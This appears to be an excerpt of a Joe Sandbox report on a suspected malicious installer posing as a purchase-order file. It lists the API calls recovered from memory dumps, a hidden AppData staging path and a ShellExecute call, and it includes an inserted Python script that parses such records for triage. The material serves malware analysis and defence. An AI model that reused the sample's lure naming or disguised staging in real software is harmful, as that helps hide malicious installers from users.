                                                                      • SetWindowLongA.USER32(?,000000FC,00404E99), ref: 0040493B
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040494F
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404961
                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404977
                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404983
                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404995
                                                                      • DeleteObject.GDI32(00000000), ref: 00404998
                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049C3
                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049CF
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A64
                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A8F
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AA3
                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404AD2
                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AE0
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404AF1
                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BEE
                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C53
                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C68
                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C8C
                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CAC
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404CC1
                                                                      • GlobalFree.KERNEL32(?), ref: 00404CD1
                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D4A
                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404DF3
                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E02
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E22
                                                                      • ShowWindow.USER32(?,00000000), ref: 00404E70
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404E7B
                                                                      • ShowWindow.USER32(00000000), ref: 00404E82
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 4be3ebb239eb5df190ca789ef438fd3f359f8d4e72245769c592d36fe31c7233
                                                                      • Instruction ID: 76d2e208bb82396193868b8099a6daa05122b73eb358a4a137ee08f8801950ae
                                                                      • Opcode Fuzzy Hash: 4be3ebb239eb5df190ca789ef438fd3f359f8d4e72245769c592d36fe31c7233
                                                                      • Instruction Fuzzy Hash: F1026CB0900209AFEB14DF94DD85AAE7BB9FB84314F10813AF610BA2E1D7789D51CF58
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040437E
                                                                      • SetWindowTextA.USER32(00000000,?), ref: 004043A8
                                                                      • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 00404459
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404464
                                                                      • lstrcmpiA.KERNEL32(Call,0079E540), ref: 00404496
                                                                      • lstrcatA.KERNEL32(?,Call), ref: 004044A2
                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044B4
                                                                        • Part of subcall function 004054E6: GetDlgItemTextA.USER32(?,?,00000400,004044EB), ref: 004054F9
                                                                        • Part of subcall function 00405F77: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FCF
                                                                        • Part of subcall function 00405F77: CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                        • Part of subcall function 00405F77: CharNextA.USER32(?,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FE1
                                                                        • Part of subcall function 00405F77: CharPrevA.USER32(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FF1
                                                                      • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404572
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040458D
                                                                        • Part of subcall function 004046E6: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                        • Part of subcall function 004046E6: wsprintfA.USER32 ref: 0040478C
                                                                        • Part of subcall function 004046E6: SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: @y$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne$Call
                                                                      • API String ID: 2624150263-735047468
                                                                      • Opcode ID: dc4fe7cf9e1a75852f8a478e9657d204a566c4560be991004467591f2bc4fc9b
                                                                      • Instruction ID: dc70ebfb722856edf20ca9fe518129045a13840cef36c67e0ec65d3b8ea71268
                                                                      • Opcode Fuzzy Hash: dc4fe7cf9e1a75852f8a478e9657d204a566c4560be991004467591f2bc4fc9b
                                                                      • Instruction Fuzzy Hash: 69A182B1900208ABDB11EFA5DC45BAF77B8EF85314F10843BF601B62D1D77C9A418B69
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes, xrefs: 0040211D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes
                                                                      • API String ID: 123533781-1484825760
                                                                      • Opcode ID: 9070b07f5c49c3eba4a055dbb4da1717ebb68c024122170813a0f181913405a8
                                                                      • Instruction ID: 14d4926e91d078e82bebccc5f6ab74bc99395aff19d04a9878b07c190defc42e
                                                                      • Opcode Fuzzy Hash: 9070b07f5c49c3eba4a055dbb4da1717ebb68c024122170813a0f181913405a8
                                                                      • Instruction Fuzzy Hash: 9D513871A00208BFDB10DFA4C988A9DBBB5FF48318F20856AF515EB2D1DB799941CB54
                                                                      APIs
                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: d3616940253a6c47e3692c4c08840169220b4dbfcc92f4ed15c26e48d9ac8dbb
                                                                      • Instruction ID: 693c9160ce4d260d62fecbf2f45a0834f3a8ccba4a644e55fc62545b2e120305
                                                                      • Opcode Fuzzy Hash: d3616940253a6c47e3692c4c08840169220b4dbfcc92f4ed15c26e48d9ac8dbb
                                                                      • Instruction Fuzzy Hash: F9F0A0335081509FE701E7B49949AEEB778EF61324F60457BF241B21C1D7B84A84AA3A
                                                                      APIs
                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040C5
                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 004040D9
                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040F7
                                                                      • GetSysColor.USER32(?), ref: 00404108
                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404117
                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404126
                                                                      • lstrlenA.KERNEL32(?), ref: 00404129
                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404138
                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040414D
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004041AF
                                                                      • SendMessageA.USER32(00000000), ref: 004041B2
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041DD
                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040421D
                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0040422C
                                                                      • SetCursor.USER32(00000000), ref: 00404235
                                                                      • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 00404248
                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404255
                                                                      • SetCursor.USER32(00000000), ref: 00404258
                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404284
                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404298
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: Call$N$open
                                                                      • API String ID: 3615053054-2563687911
                                                                      • Opcode ID: ffa70ba6b414771cfedee8d2664e4b0672246e5e1ae3d005f3366e5b10bf2318
                                                                      • Instruction ID: 325d301b2710361d9817967eb08788495a0e15e312a989604f50e6602a626d4c
                                                                      • Opcode Fuzzy Hash: ffa70ba6b414771cfedee8d2664e4b0672246e5e1ae3d005f3366e5b10bf2318
                                                                      • Instruction Fuzzy Hash: 9161C671A40209BFEB109F60DC45F6A7B69FB84744F10816AFB05BA2D1C7BCA951CF98
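The records above are the report's per-function view: each "APIs" block lists the Windows calls one routine makes, with the arguments the sandbox recovered (hex constants, `?` for unknowns, literal strings) and the return address after the call as `ref`, and a "Strings" block lists literals the routine references. For triage the useful material is in the string arguments rather than in the opcode hashes: the staging directory under `C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne` referenced next to the CoCreateInstance/MultiByteToWideChar pair, the ShellExecuteA call with the `open` verb, and the own-path and `%TEMP%` arguments that surface through the CharNextA subcall lines. The Python script below is an added example for this page, not Joe Sandbox code and not code from the analysed sample: it parses a constructed excerpt written in the shape of these entries, keeps the "Part of subcall function" annotations apart from the routine's own calls, and pulls out every drive-letter path plus the calls on an assumed, illustrative watchlist of API names.

```python
"""Parse the per-function "APIs" / "Strings" records of a Joe Sandbox report.

Added example for this page; it is not Joe Sandbox code and not part of the
analysed sample. SAMPLE_REPORT is a constructed excerpt shaped like the entries
above, and WATCHLIST is an assumed, illustrative set of API names.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE_REPORT = r"""
APIs
• CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
• MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8), ref: 00402189
Strings
• C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes, xrefs: 0040211D
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
APIs
• ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 00404248
  • Part of subcall function 00405F77: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405FCF
• wsprintfA.USER32 ref: 0040478C
"""

# "• [Part of subcall function XXXXXXXX: ]Api.MODULE(args), ref: XXXXXXXX"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
# "• <literal>, xrefs: XXXXXXXX" (greedy, so commas inside the literal survive)
STR_RE = re.compile(r"^•\s*(?P<value>.*), xrefs?: (?P<xref>[0-9A-Fa-f]{8})$")
# drive-letter path inside an argument; stops at the comma or quote that ends it
PATH_RE = re.compile(r'[A-Za-z]:\\[^,"]+')

WATCHLIST = {"ShellExecuteA", "CoCreateInstance", "FindFirstFileA"}  # assumed; adjust per case


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                      # return address inside the sample
    parent: Optional[str] = None  # set on "Part of subcall function" lines


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_report(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per 'APIs' block; a 'Strings' block attaches to the open entry.
    Any other section header (Memory Dump Source, Similarity, ...) just ends the
    bullet list being read, and the '• Opcode ID' bullet closes the entry."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    mode: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
            mode = "apis"
        elif line == "Strings":
            if current is None:
                current = FunctionEntry()
                entries.append(current)
            mode = "strings"
        elif line.startswith("• Opcode ID:"):
            current, mode = None, None
        elif not line.startswith("•"):
            mode = None
        elif current is not None and mode == "apis":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                current.calls.append(ApiCall(m["api"], m["module"], args, m["ref"].upper(), m["parent"]))
        elif current is not None and mode == "strings":
            m = STR_RE.match(line)
            if m:
                current.strings.append(m["value"])
    return entries


def extract_paths(entries: List[FunctionEntry]) -> List[str]:
    """Every drive-letter path seen in call arguments or referenced strings, sorted."""
    found = set()
    for entry in entries:
        for call in entry.calls:
            for arg in call.args:
                found.update(PATH_RE.findall(arg))
        for literal in entry.strings:
            found.update(PATH_RE.findall(literal))
    return sorted(found)


def flag_calls(entries: List[FunctionEntry], watchlist=WATCHLIST):
    """(api, ref) for direct calls on the watchlist; subcall annotations are skipped
    so each hit points at the routine that actually makes the call."""
    return [(c.api, c.ref) for e in entries for c in e.calls
            if c.parent is None and c.api in watchlist]


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_REPORT)
    for api, ref in flag_calls(parsed):
        print(f"{api:<20} ref {ref}")
    for path in extract_paths(parsed):
        print("path:", path)
```

Run against a full report export the script yields, per routine, the calls the sandbox attributed to it plus the paths it touches, which is what you compare against the "Drops PE files" finding and the dropped-file list elsewhere on this page. The subcall lines are kept but tagged with their parent address, because the same helper (here 00405F77) is annotated under every caller and would otherwise be counted once per call site.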
                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextA.USER32(00000000,Regangen Setup,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F$Regangen Setup
• API String ID: 941294808-439938914
• Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
• Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
• Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
• Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
APIs
• lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405BE8,?,?), ref: 00405A64
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BE8,?,?), ref: 00405A88
• GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405A91
  • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
  • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926
• GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405AAE
• wsprintfA.USER32 ref: 00405ACC
• GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B07
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B16
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B4E
• SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA4
• GlobalFree.KERNEL32(00000000), ref: 00405BB5
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BBC
  • Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 00405983
  • Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
• String ID: %s=%s$NUL$[Rename]
• API String ID: 222337774-4148678300
• Opcode ID: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
• Instruction ID: 28628270b370f13d709f2e98436788b9d19fd6dde28ce54c0a079e884eb7da61
• Opcode Fuzzy Hash: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
• Instruction Fuzzy Hash: 5A311371605B18ABD6206B215C89F6B3A6CDF45764F14013BFE01F22D2DA7CBC008EAD
APIs
• CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FCF
• CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
• CharNextA.USER32(?,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FE1
• CharPrevA.USER32(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FF1
Strings
• *?|<>/":, xrefs: 00405FBF
• "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe", xrefs: 00405FB3
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405F78
Memory Dump Source
